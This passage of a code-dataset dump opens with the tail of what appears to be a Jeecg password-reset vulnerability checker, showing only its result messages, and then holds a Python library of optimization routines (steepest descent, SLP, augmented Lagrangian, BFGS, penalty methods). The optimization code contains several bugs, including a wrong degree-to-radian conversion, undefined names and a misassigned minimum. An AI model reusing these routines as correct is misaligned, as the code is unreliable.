print(\"[-]不存在jeecg_pwd_reset漏洞\", \"white\", \"on_grey\")\n\n except:\n print(\"[-] \" + __file__ + \"====>可能不存在漏洞\", \"cyan\")\n","sub_path":"Jeecg-快速开发平台/Jeecg-快速开发平台.py","file_name":"Jeecg-快速开发平台.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384666254","text":"import sympy as sy\nimport numpy as np\nimport random\nfrom sympy import *\nimport FunctionApproximation as approx\nimport scipy.optimize\nimport scipy\nimport CustomPlots\nimport math\n#from sympy.mpmath import *\n\ndef vlen(inputs):\n\ttotalSquared = 0\n\tfor input in inputs:\n\t\ttotalSquared += input*input\n\tresult = math.sqrt(totalSquared)\n\treturn result\n\ndef degToRad(deg):\n\trad = deg/360.0\n\treturn rad\n\ndef make2dList(rows, cols):\n\ta=[]\n\tfor row in xrange(rows): a += [[0]*cols]\n\treturn a\n\ndef variableSymbols(variables):\n\tif variables:\n\t\tvariableSymbols = []\n\t\tif isinstance(variables[0],str) == True:\n\t\t\tfor variable in variables:\n\t\t\t\tvariableSymbols.append(symbols(variable))\n\t\telse:\n\t\t\tvariableSymbols = variables\n\n\treturn variableSymbols\n\ndef expressionSymbols(expression):\n\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\treturn expression\n\ndef gradient(function,inputs,delta=0.0001,normalize=False):\n\t'''returns a list of partial gradients of the function around the input point'''\n\t# Inputs: function is a python function that accepts only a list of inputs as arguments\n\t# Inputs is a list representing the point at which to evaluate the function.\n\t# Optional: delta is the numerical step size of the gradient approximation\n\t# Normalize returns the slope of each partial of the gradient divided by the total slope\n\n\tslopeValues = []\n\tfor i in range(0,len(inputs)):\n\t\tnegativeInputs = list(inputs)\n\t\tnegativeInputs[i] = float(negativeInputs[i]) - float(delta)\n\t\tnegativePoint = function(negativeInputs)\n\n\t\tpositiveInputs = list(inputs)\n\t\tpositiveInputs[i] = float(positiveInputs[i]) + float(delta)\n\t\tpositivePoint = function(positiveInputs)\n\n\t\tslope = (positivePoint - negativePoint)/(2*delta)\n\t\tslopeValues.append(slope)\n\n\tif normalize == True:\n\t\ttotalSlope = vlen(slopeValues)\n\t\tfor i in range(0,len(slopeValues)):\n\t\t\tslopeValues[i] = slopeValues[i]/totalSlope\n\treturn slopeValues\n\ndef hessian(expression,variables):\n\tn = len(variables)\n\tH = make2dList(n, n)\n\n\t# Core iteration function\n\tfor i in range(0,n):\n\t\tfirstPartial = diff(expression,variableSymbol[i])\n\t\tfor j in range(0,n):\n\t\t\tif i > j:\n\t\t\t\tH[i][j] = H[j][i]\n\t\t\telse:\n\t\t\t\tH[i][j] = diff(firstPartial,variableSymbol[j])\n\n\treturn H\n\ndef steepestDescentMinimum(function,startingPoint,epsilon=0.0001,nMax=100,damping=1,echo=False,parabolaFitStepSize = 0.1,constantStepSize = 0.1,**kwargs):\n\t'''minimizes output of function using steepest descent method'''\n\t# Inputs: python function which returns a single value and takes an input of a list of values\n\t# Variables is a list of text inputs for each input variable\n\t# StartingPoint is a vector of intial points for each input variable\n\t# Convergence and timeout parameters are optional\n\talpha = [-parabolaFitStepSize,0,parabolaFitStepSize]\n\ti = 0\n\n\t# Loop\n\tshouldContinue = True\n\tposition = startingPoint\n\tobjectiveValue = function(position)\n\t# print(\"starting loop...\")\n\t# Print current iteration results\n\tif echo == True:\n\t\theaderString = \"Iteration\\tPosition\\t\"\n\t\theaderString += \"Gradient\\t\"\n\t\theaderString += \"F(x)\"\n\t\tprint(headerString)\n\n\twhile shouldContinue == True:\n\t\ti = i+1\n\t\t# Get gradient at position\n\t\t# print(\"About to get gradient\")\n\t\tslopeList = gradient(function,position)\n\t\t# print(\"fitting polynomial...\")\n\t\t# Get three points in that direction at positions of alpha\n\t\tfunctionValues = []\n\t\tfor alphaValue in alpha:\n\t\t\ttestLocation = []\n\t\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\t\ttestLocation.append(oldPosition-slope*alphaValue)\n\t\t\tfunctionValues.append(function(testLocation))\n\t\t# Fit parabola to curve\n\t\tC = approx.threePointQuadraticApprox(alpha, functionValues)\n\t\t# Check parabola is concave up\n\t\t# Calculate alpha that gives minimum\n\t\talphaStar = 0.0\n\t\tif C[2] < 0:\n\t\t\tprint(\"Fitted parabola is concave down. Minimum alpha value is not bounded.\")\n\t\t\talphaStar = constantStepSize\n\t\telif abs(C[2]) < 0.001:\n\t\t\tprint(\"Shallow gradient, using constant step size\")\n\t\t\talphaStar = constantStepSize\n\t\telse:\n\t\t\t(alphaStar,bestY) = minimizeParabola(C)\n\t\t# Move to position of calculated alpha\n\t\tnewPosition = []\n\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\tnewPosition.append(oldPosition-slope*damping*alphaStar)\n\t\tlastPosition = position\n\t\tposition = newPosition\n\t\tobjectiveValueLast = objectiveValue\n\t\tobjectiveValue = function(position)\n\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(i)\n\t\t\tresultsString += \"{}\\t\".format(position)\n\t\t\tresultsString += \"{}\\t\".format(slopeList)\n\t\t\tresultsString += \"%2.6f\" % (objectiveValue)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tdeltaObjective = objectiveValueLast - objectiveValue\n\t\t#print(\"Delta Objective = %2.4f\" % (float(deltaObjective)))\n\t\tif abs(deltaObjective) <= epsilon:\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\n\t\t#print(\"About to check iteration maximum\")\n\t\tif i > nMax:\n\t\t\tprint(\"Function timed out. Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tprint(\"Position is:\")\n\tprint(position)\n\tprint(\"F = %2.6f\" % (objectiveValue))\n\treturn (objectiveValue, position)\n\ndef SLP(expression,variables,startingPoint,inequalityConstraints=[],epsilon=0.0001,nMax=100,stepMax = 0.5,saveSequence=False,echo=False):\n\t# Outputs: optimum position\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\n\tshouldContinue = True\n\tposition = startingPoint\n\tobjectiveValue = evaluateExpression(expression, variables = variables, values = position)\n\tif echo == True:\n\t\theaderString = \"Iteration\\t\"\n\t\tfor variable in variables:\n\t\t\theaderString += \"%s\\t\" % (variable)\n\t\theaderString += \"F(x)\"\n\t\tprint(headerString)\n\tdesignSequence = [position]\n\n\tn = 0\n\ttaylorCoeffs = [0]*len(inequalityConstraints)\n\tb = [0]*len(inequalityConstraints)\n\n\twhile shouldContinue == True:\n\t\tn = n + 1\n\t\toldPosition = list(position)\n\n\t\t# Linearize objective function and constraints\n\t\t(expressionCoeffs,intercept) = approx.taylorLinearize(expression,variables = variables, values = position)\n\t\texpressionCoeffs = np.array(expressionCoeffs)\n\t\tfor i in range(0,len(inequalityConstraints)):\n\t\t\t(taylorCoeffs[i],b[i]) = approx.taylorLinearize(inequalityConstraints[i],variables = variables, values = position)\n\n\t\ttaylorArray = np.array(taylorCoeffs)\n\t\t# Solve linear problem\n\t\tres = scipy.optimize.linprog(expressionCoeffs,A_ub=taylorArray,b_ub=b)\n\t\t#print(res)\n\t\t# Exctract optimum from result\n\t\tnewOptimum = res.get(\"fun\", -9999)\n\t\tobjectiveValueLast = objectiveValue\n\t\tobjectiveValue = newOptimum\n\t\t# Extract optimized design from result\n\t\tnewPosition = res.get(\"x\",[-9999]*len(variables))\n\t\tnewPosition = newPosition.tolist()\n\n\t\t# Check movement delta for each variable\n\t\tfor i in range(0,len(variables)):\n\t\t\tdelta = newPosition[i] - position[i]\n\t\t\tif abs(delta)> stepMax:\n\t\t\t\t#print(\"New position is a large move\")\n\t\t\t\t#print(\"Former position: \" + str(position[i]))\n\t\t\t\tposition[i] = position[i] + delta/abs(delta)*stepMax\n\t\t\t\t#print(\"Optimum position: \" + str(newPosition[i]))\n\t\t\t\t#print(\"Chosen move position: \" + str(position[i]))\n\t\t\telse:\n\t\t\t\tposition[i] = newPosition[i]\n\t\t\t\t#print(\"New position is a valid move\")\n\t\tdesignSequence.append(list(position))\n\n\t\t# Check convergence\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(n)\n\t\t\tfor value in position:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tresultsString += \"%2.6f\" % (objectiveValue)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tdeltaObjective = objectiveValueLast - objectiveValue\n\t\t#print(\"Last position: \" + str(oldPosition))\n\t\t#print(\"Current position: \" + str(position))\n\t\tvariableDeltas = [abs(old - new) for old, new in zip(oldPosition,position)]\n\t\t#print(variableDeltas)\n\t\tdeltaVar = max(variableDeltas)\n\t\t#print(\"Delta Objective = %2.4f\" % (float(deltaObjective)))\n\t\tif (abs(deltaObjective) <= epsilon and deltaVar <= epsilon):\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\n\t\t#print(\"About to check iteration maximum\")\n\t\tif n > nMax:\n\t\t\tprint(\"Function timed out. Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tfor variable, variableValue in zip(variables,position):\n\t\tprint(variable + \" = %2.6f\" % (variableValue))\n\tprint(\"F = %2.6f\" % (objectiveValue))\n\n\tif saveSequence == True:\n\t\tprint(designSequence)\n\t\tdesignSequence = np.array(designSequence)\n\t\tx = np.arange(0,3,0.1)\n\t\ty = np.arange(0,3,0.1)\n\t\tz = make2dList(len(y),len(x))\n\t\tconstraintValues = []\n\t\tfor i in range(0,len(inequalityConstraints)):\n\t\t\tconstraintValues.append(make2dList(len(y),len(x)))\n\t\tfor i in range(0,len(x)):\n\t\t\tfor j in range(0,len(y)):\n\t\t\t\tz[j][i] = evaluateExpression(expression,variables = variables,values = [x[i],y[j]])\n\t\t\t\tfor n in range(0,len(inequalityConstraints)):\n\t\t\t\t\tconstraintValues[n][j][i] = evaluateExpression(inequalityConstraints[n],variables = variables,values = [x[i],y[j]])\n\t\tCustomPlots.plotConstrainedContour(x,y,z,\"DesignSequence\",constraints=constraintValues,lineArray = designSequence)\n\n\treturn (objectiveValue, position)\n\ndef augmentedLagrange(expression,variables,equalityConstraints = [], x0 = [],l0 = 0,epsilon=0.0001,nMax=100,damping=1.0,rp=1.0,echo=False,**kwargs):\n\t# Inputs: expression is a text string or sympy expression for the objective function\n\t# Variables is a list of text inputs for each input variable\n\t# StartingPoint is a vector of intial points for each input variable\n\t# Convergence and timeout parameters are optional\n\talpha = [0,1,2]\n\ti = 0\n\tl = [l0]*len(equalityConstraints)\n\tconstraintValues = [0]*len(equalityConstraints)\n\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\tobjectiveExpression = expression\n\n\tequalityConstraints = [sy.sympify(constraint) for constraint in equalityConstraints]\n\n\t#if len(x0) == 0:\n\t\t# Calculate starting point from initial lagrange function\n\n\t# Loop\n\tshouldContinue = True\n\tposition = x0\n\tobjectiveValue = evaluateExpression(expression, variables = variables, values = position)\n\t#print(\"F = %2.6f\" % (objectiveValue))\n\t# print(\"About to start loop\")\n\t# Print current iteration results\n\tif echo == True:\n\t\theaderString = \"Iteration\\t\"\n\t\tfor variable in variables:\n\t\t\theaderString += \"%s\\t\" % (variable)\n\t\tfor i in range(0,len(l)):\n\t\t\theaderString += \"L%i\\t\" % (i+1)\n\t\tfor i in range(0,len(equalityConstraints)):\n\t\t\theaderString += \"h%i\\t\" % (i+1)\n\t\theaderString += \"Phi(x)\"\n\t\tprint(headerString)\n\n\tn = 0\n\twhile shouldContinue == True:\n\t\tn = n+1\n\n\t\t# Construct expression for augmented lagrange function\n\n\t\texpression = objectiveExpression\n\t\tfor i in range(0,len(equalityConstraints)):\n\t\t\texpression = expression + rp*equalityConstraints[i]*equalityConstraints[i] + l[i]*equalityConstraints[i]\n\t\t#print(expression)\n\n\t\tslopeList = getGradient(expression,variables,position,normalize=False)\n\n\t\t# Get three points in that direction at intervals of 0,0.1,0.2\n\t\tfunctionValues = [objectiveValue]\n\t\tfor alphaValue in alpha:\n\t\t\tif alphaValue != alpha[0]:\n\t\t\t\ttestLocation = []\n\t\t\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\t\t\ttestLocation.append(oldPosition+slope*alphaValue)\n\t\t\t\tfunctionValues.append(evaluateExpression(expression, variables = variables, values = testLocation))\n\t\t# Fit parabola to curve\n\t\tC = approx.threePointQuadraticApprox(alpha, functionValues)\n\t\t# Check parabola is concave up\n\t\t# Calculate alpha that gives minimum\n\t\talphaStar = 0.0\n\t\tif C[2] < 0:\n\t\t\tprint(\"Fitted parabola is concave down. Minimum alpha value is not bounded.\")\n\t\t\talphaStar = 0.1\n\t\telse:\n\t\t\t(alphaStar,bestY) = minimizeParabola(C)\n\t\t# Move to position of calculated alpha\n\t\tnewPosition = []\n\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\tnewPosition.append(oldPosition+slope*damping*alphaStar)\n\t\tlastPosition = position\n\t\tposition = newPosition\n\t\tobjectiveValueLast = objectiveValue\n\t\tobjectiveValue = evaluateExpression(expression, variables = variables, values = position)\n\n\t\t# Update lagrange multipliers\n\t\tfor i in range(0,len(equalityConstraints)):\n\t\t\tconstraintValues[i] = evaluateExpression(equalityConstraints[i], variables = variables, values = position)\n\t\t\tl[i] = l[i] + 2*rp*constraintValues[i]\n\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(n)\n\t\t\tfor value in position:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tfor value in l:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tfor value in constraintValues:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tresultsString += \"%2.6f\" % (objectiveValue)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tdeltaObjective = objectiveValueLast - objectiveValue\n\t\t#print(\"Delta Objective = %2.4f\" % (float(deltaObjective)))\n\t\tif abs(deltaObjective) <= epsilon:\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\n\t\t#print(\"About to check iteration maximum\")\n\t\tif n > nMax:\n\t\t\tprint(\"Function timed out. Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tfor variable, variableValue in zip(variables,position):\n\t\tprint(variable + \" = %2.6f\" % (variableValue))\n\tprint(\"F = %2.6f\" % (objectiveValue))\n\treturn (objectiveValue, position)\n\ndef quasiNewtonMinimization(expression,variables, startingPoint,epsilon=0.0001,nMax=100,method='bfgs',echo=False):\n\tx = startingPoint\n\ti = 0\n\tshouldContinue = True\n\tn = len(variables)\n\tA = np.identity(n)\n\talphaTestPoints = [0,0.1,0.2]\n\tfTestPoints = [0,0,0]\n\tf = 99999\n\tdelFOld = np.asarray([0,0])\n\texpression = expressionSymbols(expression)\n\tvariables = variableSymbols(variables)\n\txNew = [0,0]\n\txOld = [0,0]\n\tif echo == True:\n\t\theaderString = \"Iteration \\t\"\n\t\tfor variable in variables:\n\t\t\theaderString += str(variable) + \" \\t\"\n\t\theaderString += \"F(x)\"\n\t\tprint(headerString)\n\n\twhile shouldContinue == True:\n\t\t(slope, delF) = getGradient(expression,variables,x)\n\t\tdelF = [-delElement for delElement in delF] # Look downhill rather than uphill\n\t\tdelF = np.asarray(delF)\n\n\t\t# Calculate values for alpha Star\n\t\tj = 0\n\t\tfor alphaTest in alphaTestPoints:\n\t\t\t\txTestPoint = x + alphaTest*(np.dot(A,delF))\n\t\t\t\tfTestPoints[j] = evaluateExpression(expression,variables = variables,values = xTestPoint)\n\t\t\t\tj = j + 1\n\n\t\tC = approx.threePointQuadraticApprox(alphaTestPoints,fTestPoints)\n\n\t\t# Check parabola is concave up\n\t\t# Calculate alpha that gives minimum\n\t\talphaStar = 0.0\n\t\tif C[2] < 0:\n\t\t\tprint(\"Fitted parabola is concave down. Minimum alpha value is not bounded.\")\n\t\t\talphaStar = 0.1\n\t\telse:\n\t\t\t(alphaStar,bestY) = minimizeParabola(C)\n\t\txNew = x + alphaStar*(np.dot(A,delF))\n\t\txOld = x\n\t\tx = xNew\n\n\t\t# Calculate new A matrix\n\t\tif method == 'bfgs':\n\t\t\tp = [xElement - xOldElement for xElement, xOldElement in zip(x, xOld)] # Nx1 vector\n\t\t\ty = delF - delFOld # Nx1 vector\n\t\t\tsigma = np.dot(np.transpose(p),y) # Scalar\n\t\t\ttau = np.dot(np.dot(np.transpose(y),A),y) # Scalar\n\t\t\tD = (sigma+tau)/(sigma*sigma)*np.dot(p,np.transpose(p)) - 1/sigma*(np.dot(np.dot(A,y),np.transpose(p)) + np.dot(p,np.transpose(np.dot(A,y))))\n\t\t\tA = A + D\n\t\telif method == 'DFP':\n\t\t\tprint(\"Implementation of DFP still needed\")\n\t\telse:\n\t\t\tprint(\"No method selected in quasiNewtonMinimization\")\n\n\t\tfNew = evaluateExpression(expression,variables = variables,values = x)\n\t\tfDelta = f - fNew\n\t\tf = fNew\n\t\tdelFOld = delF\n\t\ti = i + 1\n\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(i)\n\t\t\tfor variable, value in zip(variables,x):\n\t\t\t\tresultsString += \"%2.4f \\t\" % (value)\n\t\t\tresultsString += \"%2.6f\\t\" % (f)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tif abs(fDelta) < epsilon:\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\t\tif i > nMax:\n\t\t\tprint(\"Function timed out. Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tfor variable, variableValue in zip(variables,x):\n\t\t\tprint(str(variable) + \" = %2.6f\" % (variableValue))\n\tprint(\"F = %2.6f\" % (f))\n\n\treturn (f, x)\n\ndef NewtonRaphson1DFindZeroUnconstrained(functionString,xStart,tolerance=0.0001,maxIterations=100,echo=False):\n\txSymbolic = symbols('x')\n\tobjectiveExpression = sy.sympify(functionString)\n\t#print(objectiveExpression)\n\tobjectivePrime = diff(objectiveExpression, xSymbolic)\n\t#print(objectivePrime)\n\n\tx = xStart\n\tshouldContinue = True\n\tepislon = 1000\n\ti = 0\n\tif echo==True:\n\t\tprint(\"Iter \\t X \\t F \\tF'\")\n\n\twhile shouldContinue == True:\n\t\ti = i + 1\n\t\tf = evaluateExpression(objectiveExpression, [xSymbolic],[x])\n\t\tfPrime = evaluateExpression(objectivePrime, [xSymbolic],[x])\n\t\txNew = x - f/fPrime\n\t\t#print(f)\n\t\t#print(fPrime)\n\n\t\tepsilon = abs(xNew - x)\n\n\t\tx = xNew\n\n\t\tif epsilon <= tolerance or i >= maxIterations:\n\t\t\tshouldContinue = False\n\t\tif echo==True:\n\t\t\tprint(\"%i \\t %2.4f \\t %2.4f \\t %2.4f\" % (i, x,f,fPrime))\n\n\treturn x\n\ndef NewtonRaphson1DFindMinUnconstrained(functionString,xStart,tolerance=0.0001,maxIterations=100):\n\txSymbolic = symbols('x')\n\tobjectiveExpression = sy.sympify(functionString)\n\t#print(objectiveExpression)\n\tobjectivePrime = diff(objectiveExpression, xSymbolic)\n\t#print(objectivePrime)\n\tobjectiveDoublePrime = diff(objectivePrime, xSymbolic)\n\t#print(objectiveDoublePrime)\n\tx = xStart\n\tshouldContinue = True\n\tepislon = 1000\n\ti = 0\n\n\twhile shouldContinue == True:\n\t\ti = i + 1\n\t\tf = evaluateExpression(expression = objectiveExpression, x = x)\n\t\tfPrime = evaluateExpression(expression = objectivePrime, x = x)\n\t\tfDoublePrime = evaluateExpression(expression = objectiveDoublePrime, x = x)\n\t\txNew = x - fPrime/fDoublePrime\n\t\t#print(f)\n\t\t#print(fPrime)\n\n\t\tepsilon = abs(xNew - x)\n\n\t\tx = xNew\n\n\t\tif epsilon <= tolerance or i >= maxIterations:\n\t\t\tshouldContinue = False\n\t\tprint(\"Iteration = %i, X = %2.4f, F = %2.4f, F' = %2.4f\" % (i, x,f,fPrime))\n\n\terror = evaluateExpression(expression = objectiveExpression, x = x)\n\n\treturn x\n\ndef evaluateExteriorPenalty(function, position,\n\tinequalityConstraints=[],\n\tequalityConstraints=[], rp=1):\n\t\"\"\"returns a float at the location selected with constraint penalties\"\"\"\n\n\tobjectiveValue = function(position)\n\n\tpenalty_total = 0\n\tfor constraint in inequalityConstraints:\n\t\tpenalty = constraint(position)\n\t\tpenalty = max(0,penalty)**2\n\t\tpenalty_total += penalty\n\n\tfor constraint in equalityConstraints:\n\t\tpenalty = constraint(position)**2\n\t\tpenalty_total += penalty\n\n\ttotalValue = objectiveValue + rp * penalty_total\n\tresult = totalValue\n\n\treturn result\n\ndef evaluateLinearExtendedPenalty(\n\tfunction, position,\n\tinequalityConstraints=[],\n\tequalityConstraints=[],\n\trp=1.0,\n\tepsilon = -9999):\n\t\"\"\"returns a float at the location selected with constraint penalties\"\"\"\n\n\tif epsilon == -9999:\n\t\tepsilon = -0.2*np.sqrt(1/rp)\n\n\trpPrime = 1/rp\n\tobjectiveValue = function(position)\n\n\tinconstraintValue = 0\n\tfor constraint in inequalityConstraints:\n\t\tnewConstraintValue = constraint(position)\n\t\tif newConstraintValue > epsilon:\n\t\t\tinconstraintValue += - (2*epsilon - newConstraintValue)/epsilon**2\n\t\telse:\n\t\t\tinconstraintValue = inconstraintValue - 1/newConstraintValue\n\n\tconstraintValue = 0\n\tfor constraint in equalityConstraints:\n\t\tnewConstraintValue = constraint(position)**2\n\t\tconstraintValue = constraintValue + newConstraintValue\n\n\ttotalValue = objectiveValue + inconstraintValue/rp + constraintValue*rp\n\tresult = totalValue\n\n\treturn result\n\ndef evaluateInteriorInverseBarrierPenalty(\n\tfunction, position,\n\tinequalityConstraints=[],\n\tequalityConstraints=[],\n\trp=1.0):\n\t\"\"\"returns a float at the location selected with constraint penalties\"\"\"\n\n\tobjectiveValue = function(position)\n\n\tineq_constraint_penalty = 0\n\tfor constraint in inequalityConstraints:\n\t\tconstraint_value = constraint(position)\n\t\tif ineq_constraint_penalty <= 0:\n\t\t\tineq_constraint_penalty += - 1/constraint_value\n\t\telse:\n\t\t\tineq_constraint_penalty += 100*rp * constraint_value\n\n\teq_constraint_penalty = 0\n\tfor constraint in equalityConstraints:\n\t\tconstraint_value = constraint(position)**2\n\t\teq_constraint_penalty += constraint_value\n\n\tresult = objectiveValue + ineq_constraint_penalty/rp + rp * eq_constraint_penalty\n\n\treturn result\n\ndef constrainedMinimum(function,startingPoint,\n\tinequalityConstraints=[],\n\tequalityConstraints=[],\n\trp=1,\n\tmethod='ExteriorPenalty',\n\techo=False,\n\tdamping=0.1,\n\tepsilon=0.0001,\n\tnMax=100,\n\tparabolaFitStepSize = 0.1,\n\tconstantStepSize = 0.1,\n\tprintResults=True,\n\t**kwargs):\n\t'''minimizes the given function for n variables subject to boundary constraints'''\n\t# Input: function whose only argument is a list of values and which returns a single value\n\t# StartingPoint is a list of values corrosponding to the number of variables\n\t# Constraints are functions which take a list of values and return a single value\n\t# Inequality constraints return less than 0 when valid, equality equal 0\n\t# Method options: 'ExteriorPenalty', 'InteriorPenalty', 'InteriorInverseBarrier','InverseLog', 'InteriorLinearExtended', 'QuadraticExtended'\n\tif method == 'ExteriorPenalty':\n\t\tpenalizedFunction = lambda position: evaluateExteriorPenalty(function,\n\t\t\tinequalityConstraints=inequalityConstraints,\n\t\t\tequalityConstraints=equalityConstraints,\n\t\t\tposition = position,\n\t\t\trp = rp)\n\telif method == 'InteriorLinearExtended':\n\t\tpenalizedFunction = lambda position: evaluateLinearExtendedPenalty(function,\n\t\t\tinequalityConstraints=inequalityConstraints,\n\t\t\tequalityConstraints=equalityConstraints,\n\t\t\tposition = position,\n\t\t\trp = rp,\n\t\t\tepsilon = -9999)\n\telif method == 'InteriorInverseBarrier':\n\t\tpenalizedFunction = lambda position: evaluateInteriorInverseBarrier(function,\n\t\t\tinequalityConstraints=inequalityConstraints,\n\t\t\tequalityConstraints=equalityConstraints,\n\t\t\tposition = position,\n\t\t\trp = rp)\n\telse:\n\t\tprint('The method ' + method + ' is not implemented yet.')\n\t\treturn\n\t(optimum, position) = steepestDescentMinimum(penalizedFunction, startingPoint,\n\tepsilon=epsilon,\n\tnMax=nMax,\n\tdamping=damping,\n\techo=echo,\n\tparabolaFitStepSize = parabolaFitStepSize,\n\tconstantStepSize = constantStepSize,**kwargs)\n\n\treturn (optimum, position)\n\ndef minimizeCubic(c):\n\t# Inputs: Coefficients for polynomial equation according to the form C0 + C1*x + C2*x^2 + C3*x^3\n\t# Outputs: Values of x and y where y is minimized\n\ta = 3*c[3]\n\tb = 2*c[2]\n\td = c[1]\n\tinsideSqareroot = np.float64(b*b-4*a*d)\n\tif insideSqareroot < 0:\n\t\tprint(\"Minimize Cubic function encountered imaginary square root. Aborting.\")\n\t\treturn\n\tx1 = (-b+np.sqrt(insideSqareroot))/(2*a)\n\tx2 = (-b-np.sqrt(insideSqareroot))/(2*a)\n\n\tx = 0\n\ty = 0\n\n\ty1 = approx.getValueOfPoly(c,x1)\n\ty2 = approx.getValueOfPoly(c,x2)\n\tif y1 < y2:\n\t\tx = x1\n\t\ty = y1\n\telif y1 > y2:\n\t\tx = x2\n\t\ty = y1\n\telse:\n\t\tx = x1\n\t\ty = y1\n\t\tprint(\"More than one solution in Minimize Cubic\")\n\n\treturn (x,y)\n\ndef minimizeParabola(c):\n\t# Inputs: Coefficients for polynomial equation according to the form C0 + C1*x + C2*x^2...\n\t# Outputs: Values of x and y where y is minimized\n\tminX = -c[1]/(2*c[2])\n\n\tminY = approx.getValueOfPoly(c,minX)\n\treturn (minX,minY)\n\ndef convertToPenaltyFunction(coreFunction,constraints,R=1):\n\tconstraintsToSum = []\n\tnewObjective = coreFunction + \" - %2.4f*(\" % (R)\n\tfor i in range(0,len(constraints)):\n\t\tconstraint = constraints[i]\n\t\tif i == 0:\n\t\t\tnewObjective = newObjective + \"1/(\" + constraint + \")\"\n\t\telse:\n\t\t\tnewObjective = newObjective + \" + 1/(\" + constraint + \")\"\n\n\n\tnewObjective = newObjective + \")\"\n\treturn newObjective\n\ndef goldenSectionSearch(expression,xlow,xu,epsilon = 0.001,n=100,echo=False):\n\ttau = 0.381966\n\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\n\tfu = evaluateExpression(expression,variables = ['x'], values = [xu])\n\tflow = evaluateExpression(expression,variables = ['x'], values = [xlow])\n\n\tx1 = (1-tau)*xlow + tau*xu\n\tf1 = evaluateExpression(expression,variables = ['x'], values = [x1])\n\tx2 = tau*xlow + (1-tau)*xu\n\tf2 = evaluateExpression(expression,variables = ['x'], values = [x2])\n\n\tk = 3\n\tshouldContinue = True\n\n\twhile shouldContinue == True:\n\n\t\tif f1 > f2:\n\t\t\txlow = x1\n\t\t\tflow = f1\n\t\t\tx1 = x2\n\t\t\tf1 = f2\n\t\t\tx2 = tau*xlow + (1-tau)*xu\n\t\t\tf2 = evaluateExpression(expression,variables = ['x'], values = [x2])\n\t\telse:\n\t\t\txu = x2\n\t\t\tfu = f2\n\t\t\tx2 = x1\n\t\t\tf2 = f1\n\t\t\tx1 = (1-tau)*xlow + tau*xu\n\t\t\tf1 = evaluateExpression(expression,variables = ['x'], values = [x1])\n\n\t\tk = k + 1\n\t\tif echo == True:\n\t\t\tprint(\"i = %i \\t xLow = %2.4f \\t F(xLow) = %2.4f \\t xHigh = %2.4f \\t F(xHigh) = %2.4f\" % (k,xlow,flow,xu,fu))\n\n\t\tif k > n:\n\t\t\tshouldContinue = False\n\t\tif xu - xlow < epsilon:\n\t\t\tshouldContinue = False\n\tfs = [f1,f2,flow,fu]\n\txs = [x1,x2,xlow,xu]\n\tfMin = min(fs)\n\txMin = xs[fs.index(fMin)]\n\n\treturn(fMin,xMin)\n\ndef randomSeaoptimimrch2D(objectiveFunction,xStart,yStart,constraints,tolerance=0.0001, maxIterations=100):\n\tobjectiveExpression = sy.sympify(objectiveFunction)\n\tconstraintExpressions = []\n\tfor constraint in constraints:\n\t\tconstraintExpressions.append(sy.sympify(constraint))\n\n\t# Variable initializations\n\txBest = 999999999.9\n\tyBest = 999999999.9\n\tobjectiveBest = 9999999.9999\n\tx = xStart\n\ty = yStart\n\tepsilon = 100\n\tshouldContinue = True\n\ti = 0\n\tsinceLastPrint = 0\n\tprintInterval = 100\n\n\t# Iteration loop\n\twhile shouldContinue == True:\n\t\ti = i+1\n\t\tsinceLastPrint = sinceLastPrint + 1\n\t\tif sinceLastPrint >= printInterval:\n\t\t\tprint(\"Running Iteration %i\" %(i))\n\t\t\tsinceLastPrint = 0\n\n\t\txNew = x + random.uniform(-0.1, 0.1)\n\t\tyNew = y + random.uniform(-0.1,0.1)\n\t\tobjectiveNew = evaluateExpression(objectiveExpression,x=xNew,y=yNew)\n\t\tvalidPoint = True\n\t\tif objectiveNew < objectiveBest:\n\t\t\tfor g in constraintExpressions:\n\t\t\t\tif evaluateExpression(expression=g,x=x,y=y) > 0:\n\t\t\t\t\tvalidPoint = False\n\n\t\t\tif validPoint == True:\n\t\t\t\t# Move and store new location\n\t\t\t\txLast = x\n\t\t\t\tyLast = y\n\t\t\t\tobjectiveLast = objectiveBest\n\n\t\t\t\tx = xNew\n\t\t\t\ty = yNew\n\t\t\t\tobjectiveBest = objectiveNew\n\n\t\t\t\t# Check convergence\n\t\t\t\tepsilon = objectiveLast - objectiveBest\n\t\t\t\tprint(\"Best solution so far: %2.4f\" % (objectiveBest))\n\n\t\tif epsilon <= tolerance or i >= maxIterations:\n\t\t\tshouldContinue = False\n\n\treturn (x, y, 